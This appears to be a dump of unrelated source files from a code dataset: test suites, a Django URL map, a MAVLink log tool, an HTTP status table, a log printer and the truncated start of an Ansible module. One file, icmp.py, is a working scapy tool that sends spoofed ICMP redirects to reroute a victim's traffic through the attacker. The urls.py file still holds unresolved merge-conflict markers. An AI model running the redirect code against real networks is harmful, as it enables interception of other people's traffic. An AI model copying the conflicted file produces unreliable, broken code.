self.node.reload()
assert_equal(len(self.node.logs), nlog + 1)
assert_equal(
self.node.logs.latest().action,
'{0}_{1}'.format(self.short_name, action),
)
assert_equal(
self.node.logs.latest().params['path'],
path
)
def test_after_fork_by_authorized_user(self):
fork = ProjectFactory()
clone, message = self.node_settings.after_fork(
node=self.node, fork=fork, user=self.user_settings.owner
)
assert_equal(clone.user_settings._id, self.user_settings._id)
def test_after_fork_by_unauthorized_user(self):
fork = ProjectFactory()
user = UserFactory()
clone, message = self.node_settings.after_fork(
node=self.node, fork=fork, user=user,
save=True
)
assert_is(clone.user_settings, None)
def test_before_fork(self):
node = ProjectFactory()
message = self.node_settings.before_fork(node, self.user)
assert_true(message)
def test_before_remove_contributor_message(self):
message = self.node_settings.before_remove_contributor(
self.node, self.user)
assert_true(message)
assert_in(self.user.fullname, message)
assert_in(self.node.project_or_component, message)
def test_after_remove_authorized_user_not_self(self):
message = self.node_settings.after_remove_contributor(
self.node, self.user_settings.owner)
self.node_settings.save()
assert_is_none(self.node_settings.user_settings)
assert_true(message)
assert_in('You can re-authenticate', message)
def test_after_remove_authorized_user_self(self):
auth = Auth(user=self.user_settings.owner)
message = self.node_settings.after_remove_contributor(
self.node, self.user_settings.owner, auth)
self.node_settings.save()
assert_is_none(self.node_settings.user_settings)
assert_true(message)
assert_not_in('You can re-authenticate', message)
def test_after_delete(self):
self.node.remove_node(Auth(user=self.node.creator))
# Ensure that changes to node settings have been saved
self.node_settings.reload()
assert_is_none(self.node_settings.user_settings)
assert_is_none(self.node_settings.folder_id)
class OAuthCitationsTestSuiteMixinBase(OAuthAddonModelTestSuiteMixinBase):
@abc.abstractproperty
def ProviderClass(self):
pass
@abc.abstractproperty
def OAuthProviderClass(self):
pass
class OAuthCitationsNodeSettingsTestSuiteMixin(OAuthAddonNodeSettingsTestSuiteMixin, OAuthCitationsTestSuiteMixinBase):
def setUp(self):
super(OAuthCitationsNodeSettingsTestSuiteMixin, self).setUp()
self.user_settings.grant_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake_folder_id'}
)
self.user_settings.save()
def test_fetch_folder_name_root(self):
self.node_settings.list_id = 'ROOT'
assert_equal(
self.node_settings.fetch_folder_name,
'All Documents'
)
def test_selected_folder_name_empty(self):
self.node_settings.list_id = None
assert_equal(
self.node_settings.fetch_folder_name,
''
)
def test_selected_folder_name(self):
# Mock the return from api call to get the folder's name
mock_folder = MockFolder()
name = None
with mock.patch.object(self.OAuthProviderClass, '_folder_metadata', return_value=mock_folder):
name = self.node_settings.fetch_folder_name
assert_equal(
name,
'Fake Folder'
)
def test_api_not_cached(self):
# The first call to .api returns a new object
with mock.patch.object(self.NodeSettingsClass, 'oauth_provider') as mock_api:
api = self.node_settings.api
mock_api.assert_called_once()
assert_equal(api, mock_api())
def test_api_cached(self):
# Repeated calls to .api returns the same object
with mock.patch.object(self.NodeSettingsClass, 'oauth_provider') as mock_api:
self.node_settings._api = 'testapi'
api = self.node_settings.api
assert_false(mock_api.called)
assert_equal(api, 'testapi')
############# Overrides ##############
# `pass` due to lack of waterbutler- #
# related events for citation addons #
######################################
def _node_settings_class_kwargs(self, node, user_settings):
return {
'user_settings': self.user_settings,
'list_id': 'fake_folder_id',
'owner': self.node
}
def test_serialize_credentials(self):
pass
def test_serialize_credentials_not_authorized(self):
pass
def test_serialize_settings(self):
pass
def test_serialize_settings_not_configured(self):
pass
def test_create_log(self):
pass
def test_set_folder(self):
folder_id = 'fake-folder-id'
folder_name = 'fake-folder-name'
self.node_settings.clear_settings()
self.node_settings.save()
assert_is_none(self.node_settings.list_id)
provider = self.ProviderClass()
provider.set_config(
self.node_settings,
self.user,
folder_id,
folder_name,
auth=Auth(user=self.user),
)
# instance was updated
assert_equal(
self.node_settings.list_id,
'fake-folder-id',
)
# user_settings was updated
# TODO: the call to grant_oauth_access should be mocked
assert_true(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake-folder-id'}
)
)
log = self.node.logs.latest()
assert_equal(log.action, '{}_folder_selected'.format(self.short_name))
assert_equal(log.params['folder_id'], folder_id)
assert_equal(log.params['folder_name'], folder_name)
@mock.patch('framework.status.push_status_message')
def test_remove_contributor_authorizer(self, mock_push_status):
contributor = UserFactory()
self.node.add_contributor(contributor, permissions=['read', 'write', 'admin'])
self.node.remove_contributor(self.node.creator, auth=Auth(user=contributor))
assert_false(self.node_settings.has_auth)
assert_false(self.user_settings.verify_oauth_access(self.node, self.external_account))
def test_remove_contributor_not_authorizer(self):
contributor = UserFactory()
self.node.add_contributor(contributor)
self.node.remove_contributor(contributor, auth=Auth(user=self.node.creator))
assert_true(self.node_settings.has_auth)
assert_true(self.user_settings.verify_oauth_access(self.node, self.external_account))
@mock.patch('framework.status.push_status_message')
def test_fork_by_authorizer(self, mock_push_status):
fork = self.node.fork_node(auth=Auth(user=self.node.creator))
self.user_settings.reload()
assert_true(fork.get_addon(self.short_name).has_auth)
assert_true(self.user_settings.verify_oauth_access(fork, self.external_account))
@mock.patch('framework.status.push_status_message')
def test_fork_not_by_authorizer(self, mock_push_status):
contributor = UserFactory()
self.node.add_contributor(contributor)
fork = self.node.fork_node(auth=Auth(user=contributor))
assert_false(fork.get_addon(self.short_name).has_auth)
assert_false(self.user_settings.verify_oauth_access(fork, self.external_account))
class CitationAddonProviderTestSuiteMixin(OAuthCitationsTestSuiteMixinBase):
@abc.abstractproperty
def ApiExceptionClass(self):
pass
def setUp(self):
super(CitationAddonProviderTestSuiteMixin, self).setUp()
self.provider = self.OAuthProviderClass()
@abc.abstractmethod
def test_handle_callback(self):
pass
def test_citation_lists(self):
mock_client = mock.Mock()
mock_folders = [MockFolder()]
mock_list = mock.Mock()
mock_list.items = mock_folders
mock_client.folders.list.return_value = mock_list
mock_client.collections.return_value = mock_folders
self.provider._client = mock_client
mock_account = mock.Mock()
self.provider.account = mock_account
res = self.provider.citation_lists(self.ProviderClass()._extract_folder)
assert_equal(res[1]['name'], mock_folders[0].name)
assert_equal(res[1]['id'], mock_folders[0].json['id'])
def test_client_not_cached(self):
# The first call to .client returns a new client
with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
mock_account = mock.Mock()
mock_account.expires_at = timezone.now()
self.provider.account = mock_account
self.provider.client
mock_get_client.assert_called
assert_true(mock_get_client.called)
def test_client_cached(self):
# Repeated calls to .client returns the same client
with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
self.provider._client = mock.Mock()
res = self.provider.client
assert_equal(res, self.provider._client)
assert_false(mock_get_client.called)
def test_has_access(self):
with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
mock_client = mock.Mock()
mock_error = mock.PropertyMock()
mock_error.status_code = 403
mock_error.text = 'Mocked 403 ApiException'
mock_client.folders.list.side_effect = self.ApiExceptionClass(mock_error)
mock_client.collections.side_effect = self.ApiExceptionClass(mock_error)
mock_get_client.return_value = mock_client
with assert_raises(HTTPError) as exc_info:
self.provider.client
assert_equal(exc_info.exception.code, 403)
| apache-2.0 |
bacemtayeb/Tierra | src/modules/poison/icmp.py | 1 | 2658 | from scapy.all import *
from poison import Poison
from threading import Thread
from zoption import Zoption
import time
import config
import util
class icmp(Poison):
def __init__(self):
super(icmp, self).__init__('ICMP Redirection')
conf.verb = 0
self.local = (config.get('ip_addr'), get_if_hwaddr(config.get('iface')))
self.victim = ()
self.target = ()
self.config.update({"victim_ip":Zoption(type = "ip",
value = None,
required = True,
display = "Redirect host"),
"target_ip":Zoption(type = "ip",
value = None,
required = True,
display = "Redirect victim to"),
"respoof":Zoption(type = "int",
value = 15,
required = False,
display = "Interval (seconds) to send respoofed redirects")
})
self.info = """
Send ICMP redirects to a victim. The victim system needs
to be configured to allow ICMP redirects, which is not
the default case.
"""
def initialize(self):
""" initialize a poison
"""
util.Msg('Initializing ICMP poison...')
self.victim = (self.config['victim_ip'].value,
getmacbyip(self.config['victim_ip'].value))
self.target = (self.config['target_ip'].value,
getmacbyip(self.config['target_ip'].value))
self.running = True
thread = Thread(target=self.inject)
thread.start()
return self.victim[0]
def inject(self):
""" Send ICMP redirects to the victim
"""
# icmp redirect
pkt = IP(src=self.target[0], dst=self.victim[0])
pkt /= ICMP(type=5, code=1, gw=self.local[0])
# fake UDP
pkt /= IP(src=self.victim[0], dst=self.target[0])
pkt /= UDP()
while self.running:
send(pkt)
time.sleep(self.config['respoof'].value)
return self.victim[0]
def shutdown(self):
""" Shutdown ICMP spoofing
"""
if self.running:
util.Msg("Shutting ICMP redirect down "\
"(this could take up to %s seconds)" % \
self.config['respoof'].value)
self.running = False
return True | gpl-3.0 |
miaerbus/timebank | main/urls.py | 1 | 1897 | # -*- coding: utf-8 -*-
# Copyright (C) 2009 Tim Gaggstatter <Tim.Gaggstatter AT gmx DOT net>
# Copyright (C) 2010 Eduardo Robles Elvira <edulix AT gmail DOT com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template
urlpatterns = patterns('main.views',
url(r'^contact/$', 'contact', name="contact"),
<<<<<<< HEAD
url(r'^about/$', 'about', name="about"),
url(r'^links/$', 'links', name="links"),
url(r'^faq/$', 'faq', name="faq"),
url(r'^rules/$', 'rules', name="rules"),
url(r'^terms/$', 'terms', name="terms"),
#url(r'^googlecc86ba186a99e8a4/$', 'googlecc86ba186a99e8a4', name="googlecc86ba186a99e8a4"),
=======
>>>>>>> 2db144ba2c6c34a8f17f795a1186a524059b1aa6
url(r'^set_language/$', 'set_language', name="set_language"),
url(r'^report1.csv$', 'report1', name="report1"),
url(r'^report2.csv$', 'report2', name="report2"),
url(r'^report3.csv$', 'report3', name="report3"),
url(r'^report4.csv$', 'report4', name="report4"),
url(r'^report5.csv$', 'report5', name="report5"),
(r'^/?$', 'index'),
(r'^robots\.txt$', direct_to_template,
{'template': 'robots.txt', 'mimetype': 'text/plain'}),
)
| agpl-3.0 |
kuri-kustar/pixhawk_plotting_tools | scripts/mavflighttime.py | 1 | 3316 | #!/usr/bin/env python
'''
work out total flight time for a mavlink log
'''
import sys, time, os, glob
import os, sys
from math import *
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("--condition", default=None, help="condition for packets")
parser.add_argument("--groundspeed", type=float, default=3.0, help="groundspeed threshold")
parser.add_argument("logs", metavar="LOG", nargs="+")
args = parser.parse_args()
from pymavlink import mavutil
def distance_two(GPS_RAW1, GPS_RAW2):
'''distance between two points'''
if hasattr(GPS_RAW1, 'Lat'):
lat1 = radians(GPS_RAW1.Lat)
lat2 = radians(GPS_RAW2.Lat)
lon1 = radians(GPS_RAW1.Lon)
lon2 = radians(GPS_RAW2.Lon)
elif hasattr(GPS_RAW1, 'cog'):
lat1 = radians(GPS_RAW1.Lat)*1.0e-7
lat2 = radians(GPS_RAW2.Lat)*1.0e-7
lon1 = radians(GPS_RAW1.Lon)*1.0e-7
lon2 = radians(GPS_RAW2.Lon)*1.0e-7
else:
lat1 = radians(GPS_RAW1.lat)
lat2 = radians(GPS_RAW2.lat)
lon1 = radians(GPS_RAW1.lon)
lon2 = radians(GPS_RAW2.lon)
dLat = lat2 - lat1
dLon = lon2 - lon1
a = sin(0.5*dLat)**2 + sin(0.5*dLon)**2 * cos(lat1) * cos(lat2)
c = 2.0 * atan2(sqrt(a), sqrt(1.0-a))
return 6371 * 1000 * c
def flight_time(logfile):
'''work out flight time for a log file'''
print("Processing log %s" % filename)
mlog = mavutil.mavlink_connection(filename)
in_air = False
start_time = 0.0
total_time = 0.0
total_dist = 0.0
t = None
last_msg = None
while True:
m = mlog.recv_match(type=['GPS','GPS_RAW_INT'], condition=args.condition)
if m is None:
print "I am empty !"
if in_air:
total_time += time.mktime(t) - start_time
if total_time > 0:
print("Flight time : %u:%02u" % (int(total_time)/60, int(total_time)%60))
return (total_time, total_dist)
if m.get_type() == 'GPS_RAW_INT':
groundspeed = m.vel*0.01
status = m.fix_type
print "Status:" + status
else:
groundspeed = m.VelE
status = m.Fix
if status < 3:
continue
t = time.localtime(m._timestamp)
if groundspeed > args.groundspeed and not in_air:
print("In air at %s (percent %.0f%% groundspeed %.1f)" % (time.asctime(t), mlog.percent, groundspeed))
in_air = True
start_time = time.mktime(t)
elif groundspeed < args.groundspeed and in_air:
print("On ground at %s (percent %.1f%% groundspeed %.1f time=%.1f seconds)" % (
time.asctime(t), mlog.percent, groundspeed, time.mktime(t) - start_time))
in_air = False
total_time += time.mktime(t) - start_time
if last_msg is not None:
total_dist += distance_two(last_msg, m)
last_msg = m
return (total_time, total_dist)
total_time = 0.0
total_dist = 0.0
for filename in args.logs:
for f in glob.glob(filename):
(ftime, fdist) = flight_time(f)
total_time += ftime
total_dist += fdist
print("Total time in air: %u:%02u" % (int(total_time)/60, int(total_time)%60))
print("Total distance trevelled: %.1f meters" % total_dist)
| lgpl-3.0 |
MayOneUS/pledgeservice | lib/mailchimp/requests/status_codes.py | 695 | 3136 | # -*- coding: utf-8 -*-
from .structures import LookupDict
_codes = {
# Informational.
100: ('continue',),
101: ('switching_protocols',),
102: ('processing',),
103: ('checkpoint',),
122: ('uri_too_long', 'request_uri_too_long'),
200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
201: ('created',),
202: ('accepted',),
203: ('non_authoritative_info', 'non_authoritative_information'),
204: ('no_content',),
205: ('reset_content', 'reset'),
206: ('partial_content', 'partial'),
207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
208: ('already_reported',),
226: ('im_used',),
# Redirection.
300: ('multiple_choices',),
301: ('moved_permanently', 'moved', '\\o-'),
302: ('found',),
303: ('see_other', 'other'),
304: ('not_modified',),
305: ('use_proxy',),
306: ('switch_proxy',),
307: ('temporary_redirect', 'temporary_moved', 'temporary'),
308: ('resume_incomplete', 'resume'),
# Client Error.
400: ('bad_request', 'bad'),
401: ('unauthorized',),
402: ('payment_required', 'payment'),
403: ('forbidden',),
404: ('not_found', '-o-'),
405: ('method_not_allowed', 'not_allowed'),
406: ('not_acceptable',),
407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
408: ('request_timeout', 'timeout'),
409: ('conflict',),
410: ('gone',),
411: ('length_required',),
412: ('precondition_failed', 'precondition'),
413: ('request_entity_too_large',),
414: ('request_uri_too_large',),
415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
417: ('expectation_failed',),
418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
422: ('unprocessable_entity', 'unprocessable'),
423: ('locked',),
424: ('failed_dependency', 'dependency'),
425: ('unordered_collection', 'unordered'),
426: ('upgrade_required', 'upgrade'),
428: ('precondition_required', 'precondition'),
429: ('too_many_requests', 'too_many'),
431: ('header_fields_too_large', 'fields_too_large'),
444: ('no_response', 'none'),
449: ('retry_with', 'retry'),
450: ('blocked_by_windows_parental_controls', 'parental_controls'),
451: ('unavailable_for_legal_reasons', 'legal_reasons'),
499: ('client_closed_request',),
# Server Error.
500: ('internal_server_error', 'server_error', '/o\\', '✗'),
501: ('not_implemented',),
502: ('bad_gateway',),
503: ('service_unavailable', 'unavailable'),
504: ('gateway_timeout',),
505: ('http_version_not_supported', 'http_version'),
506: ('variant_also_negotiates',),
507: ('insufficient_storage',),
509: ('bandwidth_limit_exceeded', 'bandwidth'),
510: ('not_extended',),
}
codes = LookupDict(name='status_codes')
for (code, titles) in list(_codes.items()):
for title in titles:
setattr(codes, title, code)
if not title.startswith('\\'):
setattr(codes, title.upper(), code)
| apache-2.0 |
uclouvain/osis_louvain | base/tests/forms/test_edition_form.py | 1 | 16685 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.contrib.auth.models import Group
from django.test import TestCase, RequestFactory
from django.utils.translation import gettext
from base.business.learning_unit_year_with_context import get_with_context
from base.forms.learning_unit.edition_volume import VolumeEditionForm, VolumeEditionBaseFormset, \
VolumeEditionFormsetContainer
from base.models.person import CENTRAL_MANAGER_GROUP, FACULTY_MANAGER_GROUP
from base.tests.factories.business.learning_units import GenerateContainer, GenerateAcademicYear
from base.tests.factories.learning_component_year import LearningComponentYearFactory
from base.tests.factories.person import PersonFactory
class TestVolumeEditionForm(TestCase):
def setUp(self):
self.start_year = 2010
self.end_year = 2020
self.generated_ac_years = GenerateAcademicYear(self.start_year, self.end_year)
self.generated_container = GenerateContainer(self.start_year, self.end_year)
self.first_learning_unit_year = self.generated_container.generated_container_years[0].learning_unit_year_full
self.learning_unit_with_context = get_with_context(
learning_container_year_id=self.first_learning_unit_year.learning_container_year)[0]
def test_get_volume_form(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertEqual(form.initial, component_values)
def test_post_volume_form(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_valid_data(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertTrue(form.is_valid())
def test_post_volume_form_empty_field(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_wrong_data_empty_field(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertFalse(form.is_valid())
def test_post_volume_form_wrong_volume_total(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_wrong_data_volume_tot(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertTrue(form.is_valid()) # Accept that vol_q1 + vol_q2 is not equal to vol_tot
def test_post_volume_form_wrong_volume_tot_requirement(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_wrong_data_volume_tot(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertTrue(form.is_valid()) # Accept that vol_tot * cp is not equal to vol_global
def test_post_volume_form_wrong_vol_req_entity(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_wrong_data_vol_req_entity(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertTrue(form.is_valid()) # Accept that vol_global is not equal to sum of volumes of entities
def test_post_volume_form_partim_q1(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_valid_partim_data_alter(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
self.assertTrue(form.is_valid())
def test_get_entity_fields(self):
for component, component_values in self.learning_unit_with_context.components.items():
component_values = VolumeEditionBaseFormset._clean_component_keys(component_values)
form = VolumeEditionForm(
data=_get_valid_partim_data_alter(),
learning_unit_year=self.learning_unit_with_context,
initial=component_values,
component=component,
entities=self.learning_unit_with_context.entities)
actual_entity_fields = form.get_entity_fields()
self.assertEqual(len(actual_entity_fields), 3)
def _get_wrong_data_empty_field():
data = _get_valid_data()
data['volume_total'] = ''
return data
def _get_wrong_data_volume_tot():
data = _get_valid_data()
data['volume_total'] = 3
return data
def _get_wrong_data_vol_req_entity():
data = _get_valid_data()
data['volume_additional_requirement_entity_1'] = 2
return data
def _get_valid_data():
return {
'volume_total': 2,
'volume_q1': 0,
'volume_q2': 2,
'planned_classes': 1,
'volume_requirement_entity': 1,
'volume_additional_requirement_entity_1': 0.5,
'volume_additional_requirement_entity_2': 0.5,
'volume_total_requirement_entities': 2
}
def _get_valid_partim_data():
return {
'volume_total': 1,
'volume_q1': 0,
'volume_q2': 1,
'planned_classes': 1,
'volume_requirement_entity': 0.5,
'volume_additional_requirement_entity_1': 0.25,
'volume_additional_requirement_entity_2': 0.25,
'volume_total_requirement_entities': 1
}
def _get_valid_partim_data_alter():
return {
'volume_total': 4,
'volume_q1': 1,
'volume_q2': 3,
'planned_classes': 2,
'volume_requirement_entity': 6,
'volume_additional_requirement_entity_1': 1,
'volume_additional_requirement_entity_2': 1,
'volume_total_requirement_entities': 8
}
class TestVolumeEditionFormsetContainer(TestCase):
def setUp(self):
self.start_year = 2010
self.end_year = 2020
self.generated_ac_years = GenerateAcademicYear(self.start_year, self.end_year)
self.generated_container = GenerateContainer(self.start_year, self.end_year)
self.generated_container_year = self.generated_container.generated_container_years[0]
self.learning_container_year = self.generated_container.generated_container_years[0].learning_container_year
self.learning_units_with_context = get_with_context(
learning_container_year_id=self.learning_container_year)
self.learning_unit_year_full = self.generated_container_year.learning_unit_year_full
self.learning_unit_year_partim = self.generated_container_year.learning_unit_year_partim
self.central_manager = PersonFactory()
self.central_manager.user.groups.add(Group.objects.get(name=CENTRAL_MANAGER_GROUP))
self.faculty_manager = PersonFactory()
self.faculty_manager.user.groups.add(Group.objects.get(name=FACULTY_MANAGER_GROUP))
def test_get_volume_edition_formset_container(self):
request_factory = RequestFactory()
volume_edition_formset_container = VolumeEditionFormsetContainer(request_factory.get(None),
self.learning_units_with_context,
self.central_manager)
self.assertEqual(len(volume_edition_formset_container.formsets), 2)
self.assertCountEqual(list(volume_edition_formset_container.formsets.keys()),
[self.learning_unit_year_full,
self.learning_unit_year_partim])
first_formset = volume_edition_formset_container.formsets[self.learning_unit_year_full]
self.assertEqual(len(first_formset.forms), 2)
self.assertEqual(first_formset.forms[0].learning_unit_year,
self.learning_unit_year_full)
def test_post_volume_edition_formset_container(self):
request_factory = RequestFactory()
data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym, is_partim=True))
data_forms.update({'postponement': 1})
volume_edition_formset_container = VolumeEditionFormsetContainer(
request_factory.post(None, data=data_forms),
self.learning_units_with_context, self.central_manager)
self.assertTrue(volume_edition_formset_container.is_valid())
volume_edition_formset_container.save()
def test_post_volume_edition_formset_container_wrong_vol_tot_full_must_be_greater_than_partim(self):
request_factory = RequestFactory()
data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym))
data_forms.update({'LDROI1200A-0-volume_total': 3})
data_forms.update({'LDROI1200A-0-volume_q2': 3})
data_forms.update({'LDROI1200A-0-volume_requirement_entity': 2})
data_forms.update({'LDROI1200A-0-volume_total_requirement_entities': 3})
volume_edition_formset_container = VolumeEditionFormsetContainer(
request_factory.post(None, data=data_forms),
self.learning_units_with_context, self.central_manager)
self.assertTrue(volume_edition_formset_container.is_valid()) # Volumes of partims can be greater than parent's
def test_post_volume_edition_formset_container__vol_tot_full_can_be_equal_to_partim(self):
request_factory = RequestFactory()
data_forms = get_valid_formset_data(self.learning_unit_year_full.acronym)
data_forms.update(get_valid_formset_data(self.learning_unit_year_partim.acronym))
volume_edition_formset_container = VolumeEditionFormsetContainer(
request_factory.post(None, data=data_forms),
self.learning_units_with_context, self.central_manager)
self.assertTrue(volume_edition_formset_container.is_valid())
def test_get_volume_edition_formset_container_as_faculty_manager(self):
request_factory = RequestFactory()
volume_edition_formset_container = VolumeEditionFormsetContainer(request_factory.get(None),
self.learning_units_with_context,
self.faculty_manager)
self.assertEqual(len(volume_edition_formset_container.formsets), 2)
self.assertCountEqual(list(volume_edition_formset_container.formsets.keys()),
[self.learning_unit_year_full,
self.learning_unit_year_partim])
full_formset = volume_edition_formset_container.formsets[self.learning_unit_year_full]
first_form = full_formset.forms[0]
self.assertEqual(len(full_formset.forms), 2)
self.assertEqual(first_form.learning_unit_year, self.learning_unit_year_full)
fields = first_form.fields
for key, field in fields.items():
if key in first_form._faculty_manager_fields:
self.assertFalse(field.disabled)
else:
self.assertTrue(field.disabled)
partim_formset = volume_edition_formset_container.formsets[self.learning_unit_year_partim]
first_form = partim_formset.forms[0]
self.assertEqual(len(partim_formset.forms), 2)
self.assertEqual(first_form.learning_unit_year, self.learning_unit_year_partim)
fields = first_form.fields
for key, field in fields.items():
self.assertFalse(field.disabled)
def test_volume_edition_as_faculty_manager(self):
component = LearningComponentYearFactory()
form = VolumeEditionForm(
data={'volume_q1': 12, 'volume_q2': 12},
component=component,
learning_unit_year=self.learning_unit_year_full,
is_faculty_manager=True, initial={'volume_q1': 0, 'volume_q2': 12}
)
form.is_valid()
self.assertEqual(form.errors['volume_q2'], [gettext('One of the partial volumes must have a value to 0.')])
self.assertEqual(form.errors['volume_q1'], [gettext('One of the partial volumes must have a value to 0.')])
form = VolumeEditionForm(
data={'volume_q1': 0, 'volume_q2': 12},
component=component,
learning_unit_year=self.learning_unit_year_full,
is_faculty_manager=True, initial={'volume_q1': 12, 'volume_q2': 12}
)
form.is_valid()
self.assertEqual(form.errors['volume_q1'], [gettext('The volume can not be set to 0.')])
form = VolumeEditionForm(
data={'volume_q1': 12, 'volume_q2': 0},
component=component,
learning_unit_year=self.learning_unit_year_full,
is_faculty_manager=True, initial={'volume_q1': 12, 'volume_q2': 12}
)
form.is_valid()
self.assertEqual(form.errors['volume_q2'], [gettext('The volume can not be set to 0.')])
def get_valid_formset_data(prefix, is_partim=False):
form_data = {}
data = _get_valid_data() if not is_partim else _get_valid_partim_data()
for i in range(2):
form_data.update({'{}-{}'.format(i, k): v for k, v in data.items()})
form_data.update(
{'INITIAL_FORMS': '0',
'MAX_NUM_FORMS': '1000',
'MIN_NUM_FORMS': '0',
'TOTAL_FORMS': '2'}
)
return {'{}-{}'.format(prefix, k): v for k, v in form_data.items()}
| agpl-3.0 |
ph-One/compose | compose/cli/log_printer.py | 14 | 2705 | from __future__ import absolute_import
from __future__ import unicode_literals
import sys
from itertools import cycle
from . import colors
from .multiplexer import Multiplexer
from .utils import split_buffer
from compose import utils
class LogPrinter(object):
"""Print logs from many containers to a single output stream."""
def __init__(self, containers, output=sys.stdout, monochrome=False):
self.containers = containers
self.output = utils.get_output_stream(output)
self.monochrome = monochrome
def run(self):
if not self.containers:
return
prefix_width = max_name_width(self.containers)
generators = list(self._make_log_generators(self.monochrome, prefix_width))
for line in Multiplexer(generators).loop():
self.output.write(line)
def _make_log_generators(self, monochrome, prefix_width):
def no_color(text):
return text
if monochrome:
color_funcs = cycle([no_color])
else:
color_funcs = cycle(colors.rainbow())
for color_func, container in zip(color_funcs, self.containers):
generator_func = get_log_generator(container)
prefix = color_func(build_log_prefix(container, prefix_width))
yield generator_func(container, prefix, color_func)
def build_log_prefix(container, prefix_width):
return container.name_without_project.ljust(prefix_width) + ' | '
def max_name_width(containers):
"""Calculate the maximum width of container names so we can make the log
prefixes line up like so:
db_1 | Listening
web_1 | Listening
"""
return max(len(container.name_without_project) for container in containers)
def get_log_generator(container):
if container.has_api_logs:
return build_log_generator
return build_no_log_generator
def build_no_log_generator(container, prefix, color_func):
"""Return a generator that prints a warning about logs and waits for
container to exit.
"""
yield "{} WARNING: no logs are available with the '{}' log driver\n".format(
prefix,
container.log_driver)
yield color_func(wait_on_exit(container))
def build_log_generator(container, prefix, color_func):
# Attach to container before log printer starts running
stream = container.attach(stdout=True, stderr=True, stream=True, logs=True)
line_generator = split_buffer(stream, u'\n')
for line in line_generator:
yield prefix + line
yield color_func(wait_on_exit(container))
def wait_on_exit(container):
exit_code = container.wait()
return "%s exited with code %s\n" % (container.name, exit_code)
| apache-2.0 |
Inspq/ansible | lib/ansible/modules/source_control/github_key.py | 70 | 7765 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: github_key
short_description: Manage GitHub access keys.
description:
- Creates, removes, or updates GitHub access keys.
version_added: "2.2"
options:
token:
description:
